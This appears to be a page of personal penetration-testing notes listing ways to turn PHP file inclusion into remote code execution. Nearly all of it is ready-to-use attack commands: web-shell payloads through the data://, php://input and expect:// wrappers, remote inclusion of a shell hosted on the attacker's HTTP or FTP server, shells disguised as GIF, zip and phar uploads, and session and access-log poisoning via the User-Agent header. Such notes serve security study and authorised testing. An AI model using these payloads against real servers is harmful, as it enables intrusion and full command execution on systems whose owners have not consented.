RCE

Remote Code Execution Techniques

  • PHP Wrappers

    • Data Wrapper:

      • Check if allow_url_include=On (Use LFI tricks) (A lot of the RCE requires this to be on)

        • Apache: /etc/php/X.Y/apache2/php.ini

        • Nginx: /etc/php/X.Y/fpm/php.ini

      • /index.php?path=data://text/plain;base64,PD9waHAgc3lzdGVtKCRfR0VUWyJjbWQiXSk7ID8%2BCg%3D%3D&cmd=id

    • Input Wrapper:

      • Check if allow_url_include=On (Same as data wrapper)

      • curl -s -X POST --data '<?php system($_GET["cmd"]); ?>' "http://ip:port/index.php?path=php://input&cmd=id"

    • Expect Wrapper

      • Check if extension=expect is in the php.ini files (must be on)

      • curl -s "http://ip:port/index.php?path=expect://id"

  • RFI (Can be used for SSRF to access local only ports or RCE to host our own shell) (allow_url_include=On must be in the php.ini file)

    • Host web shell: (Sometimes the only connections are allowed through websites or the servers they have open)

      • Through port 80/443:

        1. echo '<?php system($_GET["cmd"]); ?>' > shell.php && python3 -m http.server 80/443

        2. /index.php?path=http://our_ip:port/shell.php&cmd=id

      • Through ftp server

        1. python -m pyftpdlib -p 21

        2. http://ip:port/index.php?path=ftp://our_ip:port/shell.php&cmd=id

  • File Upload

    • Website wants an image:

      1. echo 'GIF8<?php system($_GET["cmd"]); ?>' > shell.gif

      2. Figure out where the file got uploaded

      3. /index.php?path=path/to/shell.gif&cmd=id

    • Zip archive:

      1. echo '<?php system($_GET["cmd"]); ?>' > shell.php && zip shell.jpg shell.php

      2. /index.php?path=zip://shell.zip%23shell.php&cmd=id

    • Phar

      • php --define phar.readonly=0 shell.php && mv shell.phar shell.jpg

      • /index.php?path=phar://path/to/shell.jpg%2Fshell.txt&cmd=id

  • Log Poisoning

    • PHP session poisoning (have to rerun the poison php parameter with web shell part everytime)

      1. Read PHP session parameters to know which one we can give our own input to

        • /index.php?path=/var/lib/php/sessions/sess_(session cookie)

      2. Poison PHP session with webshell

        • /index.php?path=%3C%3Fphp%20system%28%24_GET%5B%22cmd%22%5D%29%3B%3F%3E

      3. Run a command through the poisoned session

        • /index.php?path=/var/lib/php/sessions/sess_(session cookie)&cmd=id

    • Server Logs

      • On websites we are able to modify our User-Agent request parameter and the web server logs each request in their specific log file

        1. Poison User-Agent with a webshell: curl -s "http://ip:port/index.php" -A '<?php system($_GET["cmd"]); ?>'

        2. RCE through the log file: /index.php?path=/var/log/apache2/access.log&cmd=id

PreviousWhat to do once obtainedNextMisc

Last updated